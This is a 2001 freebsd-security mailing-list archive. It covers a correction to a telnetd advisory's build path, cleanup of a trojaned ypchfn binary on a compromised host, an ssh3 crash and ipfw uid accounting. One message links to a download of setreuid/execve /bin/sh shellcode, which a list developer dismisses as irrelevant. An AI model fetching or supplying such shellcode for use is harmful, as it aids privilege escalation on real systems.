owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --3MwIy2ne0vdjdPXF Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jul 26, 2001 at 05:10:28PM -0400, Dan Mahoney, System Admin wrote: > On Thu, 26 Jul 2001, Kris Kennaway wrote: >=20 > > On Thu, Jul 26, 2001 at 09:19:20AM -0400, Dan Mahoney, System Admin wro= te: > >=20 > > > # cd /usr/src/ > > > # patch -p < /path/to/patch > > > # cd /usr/src/secure/libexec/telnetd > > > # make depend && make all install > > >=20 > > > /* This directory does NOT exist, only /usr/src/libexec/telnetd exist= s in > > > 3.5.1-Stable */ > >=20 > > Sounds like you're not cvsupping the src-secure collection, then. >=20 > >From the supfile: >=20 > # These are the individual collections that make up FreeBSD's crypto > # collection. They are no longer export-restricted and are a part of > # src-all > #src-crypto > #src-secure > #src-sys-crypto Um, these are all commented out. Kris --3MwIy2ne0vdjdPXF Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YJMfWry0BWjoQKURAg2nAKDXC4lHcBgqMJUdiMsSiWmKYM6qBwCdHkOG i/0E/MTOni01dtZFW9aI3NM= =EJ+j -----END PGP SIGNATURE----- --3MwIy2ne0vdjdPXF-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 15: 5:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 928F837B403 for ; Thu, 26 Jul 2001 15:05:31 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 620D56722B; Thu, 26 Jul 2001 15:05:30 -0700 (PDT) Date: Thu, 26 Jul 2001 15:05:29 -0700 From: Kris Kennaway To: jianzhong ren Cc: kris@obsecurity.org, FreeBSD Security Subject: Re: some new exploit is out Message-ID: <20010726150529.A82158@xor.obsecurity.org> References: <20010726220033.19129.qmail@linuxmail.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="r5Pyd7+fXNt84Ff3" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010726220033.19129.qmail@linuxmail.org>; from jian@linuxmail.org on Fri, Jul 27, 2001 at 06:00:33AM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --r5Pyd7+fXNt84Ff3 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jul 27, 2001 at 06:00:33AM +0800, jianzhong ren wrote: >=20 > -----Original Message----- > From: Kris Kennaway <kris@obsecurity.org> > Date: Thu, 26 Jul 2001 14:52:58 -0700 > To: jianzhong ren <jian@linuxmail.org> > Subject: Re: some new exploit is out >=20 >=20 > > On Fri, Jul 27, 2001 at 05:46:41AM +0800, jianzhong ren wrote: > >=20 > > > i know that pacth for telnet is out too, but is there any new p= atch > > > for shared signals vulnerability > >=20 > > Yes, a while ago. You do read advisories, right? > >=20 > > > adn portbinding shellcode? > >=20 > > What's this one? > >=20 > > Kris >=20 > and this http://www.hack.co.za/download.php?sid=3D1445 for setreuid(0,0) = execve /bin/sh shellcode(29 bytes) > >=20 Oh, I see..you're talking about examples of shellcode, not FreeBSD vulnerabilities. That has little to no relevance to anyone on this list unless you're a script kiddie. Kris --r5Pyd7+fXNt84Ff3 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YJQoWry0BWjoQKURApFRAKCRm8WL2Sm9gfQqWufMAdK7SRLXqwCgkDk6 MdarP6lAiuUX0rVY2IiIIC0= =XI9a -----END PGP SIGNATURE----- --r5Pyd7+fXNt84Ff3-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 15:34:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from mg.hk5.outblaze.com (202-123-209-152.outblaze.com [202.123.209.152]) by hub.freebsd.org (Postfix) with ESMTP id 67A1F37B403 for ; Thu, 26 Jul 2001 15:33:59 -0700 (PDT) (envelope-from jian@linuxmail.org) Received: from ws4.us.outblaze.com (ws4.us.outblaze.com [209.249.164.192]) by mg.hk5.outblaze.com (8.11.2/8.11.2) with SMTP id f6QMXvU30870 for ; Thu, 26 Jul 2001 22:33:57 GMT Received: (qmail 21908 invoked by uid 1001); 26 Jul 2001 22:33:56 -0000 Message-ID: <20010726223356.21906.qmail@linuxmail.org> Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 4.104 (Entity 4.117) Received: from ws4.us.outblaze.com for [210.237.173.114] via web-mailer on Fri, 27 Jul 2001 06:33:56 +0800 From: "jianzhong ren" To: kris@obsecurity.org Cc: FreeBSD Security Date: Fri, 27 Jul 2001 06:33:56 +0800 Subject: Re: some new exploit is out Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Fri, Jul 27, 2001 at 06:00:33AM +0800, jianzhong ren wrote: > > > > -----Original Message----- > > From: Kris Kennaway <kris@obsecurity.org> > > Date: Thu, 26 Jul 2001 14:52:58 -0700 > > To: jianzhong ren <jian@linuxmail.org> > > Subject: Re: some new exploit is out > > > > > > > On Fri, Jul 27, 2001 at 05:46:41AM +0800, jianzhong ren wrote: > > > > > > > i know that pacth for telnet is out too, but is there any new patch > > > > for shared signals vulnerability > > > > > > Yes, a while ago. You do read advisories, right? > > > > > > > adn portbinding shellcode? > > > > > > What's this one? > > > > > > Kris > > > > and this <A HREF="http://www.hack.co.za/download.php?sid=1445" TARGET="_new"><FONT COLOR="BLUE">http://www.hack.co.za/download.php?sid=1445</FONT></A> for setreuid(0,0) execve /bin/sh shellcode(29 bytes) > > > > > Oh, I see..you're talking about examples of shellcode, not FreeBSD > vulnerabilities. That has little to no relevance to anyone on this > list unless you're a script kiddie. > i'm not a script kiddie but may be some of my user. the company where i work offer shell server in freebsd, and i want to prepare my shelll server for any kind exploit. thank you -- Get your free email from www.linuxmail.org Powered by Outblaze To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 15:55:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from prime.gushi.org (prime.gushi.org [208.23.118.172]) by hub.freebsd.org (Postfix) with ESMTP id 3425F37B401; Thu, 26 Jul 2001 15:55:10 -0700 (PDT) (envelope-from danm@prime.gushi.org) Received: from localhost (danm@localhost) by prime.gushi.org (8.11.3/8.11.3) with ESMTP id f6QMpnt18940; Thu, 26 Jul 2001 18:51:54 -0400 (EDT) Date: Thu, 26 Jul 2001 18:51:49 -0400 (EDT) From: "Dan Mahoney, System Admin" To: Kris Kennaway Cc: security@freebsd.org, security-officer@freebsd.org Subject: Re: Mistake in security advisory. In-Reply-To: <20010726150104.A79340@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 26 Jul 2001, Kris Kennaway wrote: > On Thu, Jul 26, 2001 at 05:10:28PM -0400, Dan Mahoney, System Admin wrote: > > On Thu, 26 Jul 2001, Kris Kennaway wrote: > > > > > On Thu, Jul 26, 2001 at 09:19:20AM -0400, Dan Mahoney, System Admin wrote: > > > > > > > # cd /usr/src/ > > > > # patch -p < /path/to/patch > > > > # cd /usr/src/secure/libexec/telnetd > > > > # make depend && make all install > > > > > > > > /* This directory does NOT exist, only /usr/src/libexec/telnetd exists in > > > > 3.5.1-Stable */ > > > > > > Sounds like you're not cvsupping the src-secure collection, then. > > > > >From the supfile: > > > > # These are the individual collections that make up FreeBSD's crypto > > # collection. They are no longer export-restricted and are a part of > > # src-all > > #src-crypto > > #src-secure > > #src-sys-crypto > > Um, these are all commented out. Yes they are, because as the comments say, they are included if you grab src-all (which I do, and is the default). Enclosing the full supfile. # $FreeBSD: src/share/examples/cvsup/stable-supfile,v 1.12.2.7 2000/07/09 16:25:03 markm Exp $ # # This file contains all of the "CVSup collections" that make up the # FreeBSD-stable source tree. # # CVSup (CVS Update Protocol) allows you to download the latest CVS # tree (or any branch of development therefrom) to your system easily # and efficiently (far more so than with sup, which CVSup is aimed # at replacing). If you're running CVSup interactively, and are # currently using an X display server, you should run CVSup as follows # to keep your CVS tree up-to-date: # # cvsup stable-supfile # # If not running X, or invoking cvsup from a non-interactive script, then # run it as follows: # # cvsup -g -L 2 stable-supfile # # You may wish to change some of the settings in this file to better # suit your system: # # host=CHANGE_THIS.FreeBSD.org # This specifies the server host which will supply the # file updates. You must change it to one of the CVSup # mirror sites listed in the FreeBSD Handbook at # http://www.freebsd.org/handbook/mirrors.html. # You can override this setting on the command line # with cvsup's "-h host" option. # # base=/usr # This specifies the root where CVSup will store information # about the collections you have transferred to your system. # A setting of "/usr" will generate this information in # /usr/sup. Even if you are CVSupping a large number of # collections, you will be hard pressed to generate more than # ~1MB of data in this directory. You can override the # "base" setting on the command line with cvsup's "-b base" # option. This directory must exist in order to run CVSup. # # prefix=/usr # This specifies where to place the requested files. A # setting of "/usr" will place all of the files requested # in "/usr/src" (e.g., "/usr/src/bin", "/usr/src/lib"). # The prefix directory must exist in order to run CVSup. # ############################################################################### # # DANGER! WARNING! LOOK OUT! VORSICHT! # # If you add any of the ports collections to this file, be sure to # specify them like this: # # ports-all tag=. # # If you leave out the "tag=." portion, CVSup will delete all of # the files in your ports tree. That is because the ports collections # do not use the same tags as the main part of the FreeBSD source tree. # ############################################################################### # Defaults that apply to all the collections # # IMPORTANT: Change the next line to use one of the CVSup mirror sites # listed at http://www.freebsd.org/handbook/mirrors.html. *default host=CHANGE_THIS.FreeBSD.org *default base=/usr *default prefix=/usr # The following line is for 3-stable. If you want 2.2-stable, change # "RELENG_3" to "RELENG_2_2". *default release=cvs tag=RELENG_3 *default delete use-rel-suffix # If your network link is a T1 or faster, comment out the following line. *default compress ## Main Source Tree. # # The easiest way to get the main source tree is to use the "src-all" # mega-collection. It includes all of the individual "src-*" collections, # except the export-restricted collections. src-all # These are the individual collections that make up "src-all". If you # use these, be sure to comment out "src-all" above. #src-base #src-bin #src-contrib #src-etc #src-games #src-gnu #src-include #src-kerberos5 #src-kerberosIV #src-lib #src-libexec #src-release #src-sbin #src-share #src-sys #src-tools #src-usrbin #src-usrsbin # These are the individual collections that make up FreeBSD's crypto # collection. They are no longer export-restricted and are a part of # src-all #src-crypto #src-secure #src-sys-crypto -- "Goodbye my peoples. I'll miss each one of you. Sniff-Sniff I now know the true meaning of love. Thank you Sniff-Sniff. You are all in my heart." -Chris D. --------Dan Mahoney-------- Techie, Sysadmin, WebGeek Gushi on efnet/undernet IRC ICQ: 13735144 AIM: LarpGM Web: http://prime.gushi.org finger danm@prime.gushi.org for pgp public key and tel# --------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 16:15:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from chrome.jdl.com (chrome.jdl.com [209.39.144.2]) by hub.freebsd.org (Postfix) with ESMTP id 4B72837B401 for ; Thu, 26 Jul 2001 16:15:53 -0700 (PDT) (envelope-from jdl@chrome.jdl.com) Received: from chrome.jdl.com (localhost [127.0.0.1]) by chrome.jdl.com (8.9.1/8.9.1) with ESMTP id SAA12979 for ; Thu, 26 Jul 2001 18:20:53 -0500 (CDT) (envelope-from jdl@chrome.jdl.com) Message-Id: <200107262320.SAA12979@chrome.jdl.com> To: security@freebsd.org Subject: Some Followup on that ypchfn mess of mine Clarity-Index: null Threat-Level: none Software-Engineering-Dead-Seriousness: There's no excuse for unreadable code. Net-thought: If you meet the Buddha on the net, put him in your Kill file. Date: Thu, 26 Jul 2001 18:20:51 -0500 From: Jon Loeliger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi folks, So, I've turned off telnetd. I've extracted all the critical data and backups from this machine and can recover things as needed. I'm now trying to cripple the modified ypchfh program, but I don't seem to be able to modify it in any way. I can't chmod, rm, unlink, chown,or overwrite it. All it says is "operation not permitted". How dumb am I here? Thanks, jdl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 16:21:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from science.slc.edu (Science.SLC.Edu [198.83.6.248]) by hub.freebsd.org (Postfix) with ESMTP id 1A53D37B406 for ; Thu, 26 Jul 2001 16:21:20 -0700 (PDT) (envelope-from aschneid@science.slc.edu) Received: (from aschneid@localhost) by science.slc.edu (8.11.0/8.11.0) id f6QNLNN37587; Thu, 26 Jul 2001 19:21:23 -0400 (EDT) (envelope-from aschneid) Date: Thu, 26 Jul 2001 19:21:23 -0400 From: Anthony Schneider To: Jon Loeliger Cc: security@FreeBSD.ORG Subject: Re: Some Followup on that ypchfn mess of mine Message-ID: <20010726192123.A37564@mail.slc.edu> References: <200107262320.SAA12979@chrome.jdl.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200107262320.SAA12979@chrome.jdl.com>; from jdl@jdl.com on Thu, Jul 26, 2001 at 06:20:51PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Type ls -lo /path/to/ypchfn, and look for flags set on it (i.e. schg, uchg). If any of these are set, you will need to run chflags noschg ypchfn (or switch noschg with whatever flag is set). Not sure what else it might be. -Anthony. On Thu, Jul 26, 2001 at 06:20:51PM -0500, Jon Loeliger wrote: > Hi folks, > > So, I've turned off telnetd. I've extracted all the > critical data and backups from this machine and can recover > things as needed. > > I'm now trying to cripple the modified ypchfh program, > but I don't seem to be able to modify it in any way. > I can't chmod, rm, unlink, chown,or overwrite it. > All it says is "operation not permitted". > > How dumb am I here? > > Thanks, > jdl > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 16:48:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from salvation.unixgeeks.com (cc784475-b.scrmnt1.ca.home.com [65.5.73.160]) by hub.freebsd.org (Postfix) with SMTP id 6AA3937B401 for ; Thu, 26 Jul 2001 16:48:16 -0700 (PDT) (envelope-from nathan@salvation.unixgeeks.com) Received: (qmail 52285 invoked by uid 1001); 26 Jul 2001 23:28:25 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 26 Jul 2001 23:28:25 -0000 Date: Thu, 26 Jul 2001 16:28:25 -0700 (PDT) From: nathan barrick To: Ryan Cc: Subject: Re: ssh3 In-Reply-To: <000401c11627$9f552ea0$45d8db40@mhx800> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ryan, heh, well that doesn't help my situation. but thanks for the input. anymore ideas? anyone? thanks, nathan On Thu, 26 Jul 2001, Ryan wrote: > use openssh ;] > > ----- Original Message ----- > From: "nathan barrick" > To: > Cc: > Sent: Thursday, July 26, 2001 3:34 PM > Subject: ssh3 > > > > > > > > i downloaded ssh-3.0.1.tar.gz from ssh.com. i configure/make and > > everythign works fine. no errors. but.. if i try to run the ssh client > > i get this error. > > > > Received signal 11. (no core) > > > > any ideas? i can ssh in to the box so i know the daemon still works. > > but i can't get the client to work. i've checked on the soft links to make > > sure everything is working properly and that it is all going in the right > > direction. everything seems to be. > > > > if you have any ideas they'd be greatly appreciated. > > > > nathan. > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 16:58:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 9AB4737B401 for ; Thu, 26 Jul 2001 16:58:47 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 3D5B06722C; Thu, 26 Jul 2001 16:58:46 -0700 (PDT) Date: Thu, 26 Jul 2001 16:58:45 -0700 From: Kris Kennaway To: jianzhong ren Cc: kris@obsecurity.org, FreeBSD Security Subject: Re: some new exploit is out Message-ID: <20010726165845.A86561@xor.obsecurity.org> References: <20010726223356.21906.qmail@linuxmail.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="7AUc2qLy4jB3hD7Z" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010726223356.21906.qmail@linuxmail.org>; from jian@linuxmail.org on Fri, Jul 27, 2001 at 06:33:56AM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --7AUc2qLy4jB3hD7Z Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jul 27, 2001 at 06:33:56AM +0800, jianzhong ren wrote: > > Oh, I see..you're talking about examples of shellcode, not FreeBSD > > vulnerabilities. That has little to no relevance to anyone on this > > list unless you're a script kiddie. > >=20 > i'm not a script kiddie but may be some of my user. > the company where i work offer shell server in freebsd, and i want to pre= pare my shelll server for any kind exploit. "New" examples of shellcode aren't new exploits for FreeBSD, they're pieces which can be used by someone in writing an exploit for a given vulnerability. Kris --7AUc2qLy4jB3hD7Z Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YK60Wry0BWjoQKURAq+wAKC3Myq3M22munqHaoi2dU1yDBXTxgCgrks+ b41ZMkYCIZ8R7AAwddrRcTg= =UkzZ -----END PGP SIGNATURE----- --7AUc2qLy4jB3hD7Z-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 17:20:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from chrome.jdl.com (chrome.jdl.com [209.39.144.2]) by hub.freebsd.org (Postfix) with ESMTP id 0990237B407 for ; Thu, 26 Jul 2001 17:20:55 -0700 (PDT) (envelope-from jdl@chrome.jdl.com) Received: from chrome.jdl.com (localhost [127.0.0.1]) by chrome.jdl.com (8.9.1/8.9.1) with ESMTP id TAA13221; Thu, 26 Jul 2001 19:25:57 -0500 (CDT) (envelope-from jdl@chrome.jdl.com) Message-Id: <200107270025.TAA13221@chrome.jdl.com> To: Anthony Schneider Cc: security@FreeBSD.ORG Subject: Re: Some Followup on that ypchfn mess of mine In-reply-to: Your message of "Thu, 26 Jul 2001 19:21:23 EDT." <20010726192123.A37564@mail.slc.edu> Clarity-Index: null Threat-Level: none Software-Engineering-Dead-Seriousness: There's no excuse for unreadable code. Net-thought: If you meet the Buddha on the net, put him in your Kill file. Date: Thu, 26 Jul 2001 19:25:56 -0500 From: Jon Loeliger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org So, like Anthony Schneider was saying to me just the other day: > Type ls -lo /path/to/ypchfn, and look for flags set on it > (i.e. schg, uchg). If any of these are set, you will > need to run > chflags noschg ypchfn > (or switch noschg with whatever flag is set). > Not sure what else it might be. > -Anthony. > So cleverly, I did this and it didn't work. Then I got to thinking... # sysctl kern.securelevel kern.securelevel: 1 Uh oh. Hack rc.conf, back down to -1... # chflags noschg ypchfn And finally. # chmod -x ypchfn Woo hoo! OK, so I feel a bit better now... :-) Thanks! jdl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 17:46:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 8685037B403; Thu, 26 Jul 2001 17:46:21 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 9FACD6722C; Thu, 26 Jul 2001 17:46:20 -0700 (PDT) Date: Thu, 26 Jul 2001 17:46:20 -0700 From: Kris Kennaway To: "Dan Mahoney, System Admin" Cc: Kris Kennaway , security@freebsd.org, security-officer@freebsd.org Subject: Re: Mistake in security advisory. Message-ID: <20010726174619.A3118@xor.obsecurity.org> References: <20010726150104.A79340@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="mP3DRpeJDSE+ciuQ" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from danm@prime.gushi.org on Thu, Jul 26, 2001 at 06:51:49PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --mP3DRpeJDSE+ciuQ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jul 26, 2001 at 06:51:49PM -0400, Dan Mahoney, System Admin wrote: > > Um, these are all commented out. >=20 > Yes they are, because as the comments say, they are included if you grab > src-all (which I do, and is the default). Okay, it wasn't clear you noticed this. I've just checked and it looks like you're right: the makefiles for telnet under secure/ were only added in the 4.x branch to support the SRA encryption features. There are only two telnet[d] make infrastructures in 3.x; under libexec/ and kerberosIV/. I'll try and update the advisory tomorrow. Kris --mP3DRpeJDSE+ciuQ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YLnbWry0BWjoQKURAo7VAJ9m6I0mvZ4v0NkA+4qK3A/4fE0ccACeJ+pX g1tAhcU94dITwiK1davDkFY= =x0Z7 -----END PGP SIGNATURE----- --mP3DRpeJDSE+ciuQ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 19:31:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id 5DB0C37B403 for ; Thu, 26 Jul 2001 19:31:21 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 40371 invoked by uid 1000); 27 Jul 2001 02:31:20 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 27 Jul 2001 02:31:20 -0000 Date: Thu, 26 Jul 2001 21:31:20 -0500 (CDT) From: Mike Silbersack To: "Nickolay A.Kritsky" Cc: Subject: Re: accounting with ipfw (gid, uid riles) In-Reply-To: <7167463367.20010726172101@internethelp.ru> Message-ID: <20010726212826.J40333-100000@achilles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 26 Jul 2001, Nickolay A.Kritsky wrote: > 01010 count ip from any to 212.113.112.145 via rl0 > 01010 count ip from 212.113.112.145 to any via rl0 > 01010 count ip from any to 212.113.112.145 uid nobody via rl0 > 01010 count ip from any to 212.113.112.145 uid root via rl0 > 01010 count ip from any to 212.113.112.145 uid httpd via rl0 > 01010 count ip from any to 212.113.112.145 uid ftp via rl0 The uid associated with a socket is the uid of the process which created it. So, when apache creates a socket as root, then hands it off to one of the httpd processes, it's still accounted to root. This should be true for any socket running on a port < 1024, as they have to be allocated as root. So, you're going to have to account by port numbers. In httpd's case, that shouldn't be a problem. In ftp's case, that's another story. FWIW, I had a patch which made the uid switch during accept on -current, but I figured that there were some subtle security-related problems with it and subsequently pigeonholed it. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 21:23:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from salvation.unixgeeks.com (cc784475-b.scrmnt1.ca.home.com [65.5.73.160]) by hub.freebsd.org (Postfix) with SMTP id 6AAB237B405 for ; Thu, 26 Jul 2001 21:23:29 -0700 (PDT) (envelope-from nathan@salvation.unixgeeks.com) Received: (qmail 52560 invoked by uid 1001); 27 Jul 2001 03:55:48 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 27 Jul 2001 03:55:48 -0000 Date: Thu, 26 Jul 2001 20:55:48 -0700 (PDT) From: nathan barrick To: Subject: Re: ssh3 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org okay, i've tried to recompile with pretty much every other option. earlier someone said that i might not be using the 'core' ssh utilities.. well i've used every binary possible that's rep ssh on my machine. and i get the same error on all of them. i'm using freebsd4.2-r on the machine i'm having issues with if that helps. again, i've tried pretty much everything. and i'm not exactly sure why'd it'd be doing this in the first place. if you have _anymore_ ideas or suggestion, they'd be greatly appreciated. thanks again. nathan. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 22:16:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 387C537B403 for ; Thu, 26 Jul 2001 22:16:25 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 3B9066722C; Thu, 26 Jul 2001 22:16:24 -0700 (PDT) Date: Thu, 26 Jul 2001 22:16:23 -0700 From: Kris Kennaway To: nathan barrick Cc: freebsd-security@FreeBSD.ORG Subject: Re: ssh3 Message-ID: <20010726221623.A6831@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="/9DWx/yDrRhgMJTb" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from nathan@salvation.unixgeeks.com on Thu, Jul 26, 2001 at 08:55:48PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --/9DWx/yDrRhgMJTb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jul 26, 2001 at 08:55:48PM -0700, nathan barrick wrote: >=20 > okay, i've tried to recompile with pretty much every > other option. earlier someone said that i might not be > using the 'core' ssh utilities.. well i've used every > binary possible that's rep ssh on my machine. and i get > the same error on all of them. i'm using freebsd4.2-r on > the machine i'm having issues with if that helps. >=20 > again, i've tried pretty much everything. and i'm not > exactly sure why'd it'd be doing this in the first place. >=20 > if you have _anymore_ ideas or suggestion, they'd be greatly > appreciated. thanks again. You probably should take this up on the ssh.com support mailing list, if any. Most people on this list probably don't use that software. kris --/9DWx/yDrRhgMJTb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YPknWry0BWjoQKURAhDNAKD4Ii6t3ujOdqbgco+jneNKkGOFGQCfRGES djhm0oVebQT6zDFXpUicvZo= =f0MP -----END PGP SIGNATURE----- --/9DWx/yDrRhgMJTb-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 23:16:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.airlinksys.com (mailhub.airlinksys.com [216.70.12.6]) by hub.freebsd.org (Postfix) with ESMTP id D688237B413 for ; Thu, 26 Jul 2001 23:16:47 -0700 